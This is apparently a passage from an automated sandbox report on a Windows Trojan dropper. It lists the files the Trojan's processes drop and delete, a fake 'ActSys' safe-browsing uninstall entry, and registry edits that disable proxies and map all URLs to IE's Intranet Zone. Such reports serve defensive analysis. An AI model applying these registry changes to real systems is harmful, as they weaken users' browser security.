%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (3526 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe (64392 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (127551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (76650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\1[1].zip (229748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\2[1].zip (325830 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\479.json (512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (79 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (255743 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (208 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\VMwareXVirtualXIDEXHardXDrive_00000000000000000001[1].finish,9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\VMwareXVirtualXIDEXHardXDrive_00000000000000000001[1].2008&update4=nation,us&update5=language,en (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (0 bytes)

The process CashReminder.exe:1232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\CashReminder\mfs1A.tmp (408297 bytes)
%WinDir%\Temp\P_RuleList.txt (265 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\stores[1].htm (687 bytes)
%WinDir%\Temp\P_StoreList.txt (687 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[1].txt (265 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_StoreList.txt (0 bytes)
%WinDir%\Temp\P_RuleList.txt (0 bytes)

The process GOSafer.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\G_CheckUpdate.txt (8 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[2].txt (16 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\update[1].htm (8 bytes)
%WinDir%\Temp\G_RuleList.txt (16 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\G_CheckUpdate.txt (0 bytes)
%WinDir%\Temp\G_RuleList.txt (0 bytes)

The process WNet.exe:2284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\rules[1].txt (94 bytes)
%WinDir%\Temp\P_RuleList.txt (94 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_RuleList.txt (0 bytes)

The process 310714_is.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp (57 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\awhC.tmp (171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhD.tmp (149648 bytes)

Registry activity

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 0B 73 68 19 D4 B8 20 54 0C 39 E9 0E 94 8F 7F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"DisplayName" = "ActSys"
"QuietUninstallString" = "%Program Files%\ActSys\remove_ActSys.exe /S"
"UninstallString" = "%Program Files%\ActSys\remove_ActSys.exe /S"
"Publisher" = "NINJASOFT LLC"

[HKLM\SOFTWARE\ActSys]
"Version" = "1.2.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"Comments" = "Browse safe online with our product! It alerts you if a page is harmful for your computer (Build ID: wTPAs0BV5vwXnsqTRKHr9acfe)"
"DisplayVersion" = "1.2.0"

The process net1.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 FC 87 E8 80 A2 55 7D AA 1A 8C 10 15 12 EE C2"

The process net1.exe:2596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 74 19 E5 13 50 24 54 9A 40 6B 6D DC A1 84 7D"

The process net1.exe:2220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 2E BE 5A C2 09 9D 92 F4 C5 CA 9C B2 8E DB 30"

The process net1.exe:2588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 8C FF 26 57 BD 1B F4 D2 AB BE 49 AB 1F 7F C8"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 42 7D A0 57 47 2B B7 FE 76 DE E4 3A 31 67 CE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security-zone settings so that all local web-nodes whose names contain no dots, and which are not assigned to any other zone, are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 310714_is.tmp:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 6A 3E 23 7C F3 73 72 CF 72 AC 59 12 BB 7F 79"

The process q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B CC C6 55 8D 18 2D B0 27 A2 5D EC 73 67 A1 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security-zone settings so that all local web-nodes whose names contain no dots, and which are not assigned to any other zone, are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ProtectService.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 96 CC 61 6D 7A 19 DE 6D 6B E8 FC 68 F4 93 2A"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 07 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process ProtectService.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 23 63 9C A3 6A 5E 1F 4E 66 23 2C 78 39 B7 EC"

The process ProtectService.exe:3468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 29 46 DA F9 47 D1 BE D9 26 DF 69 E6 7D 1A 96"

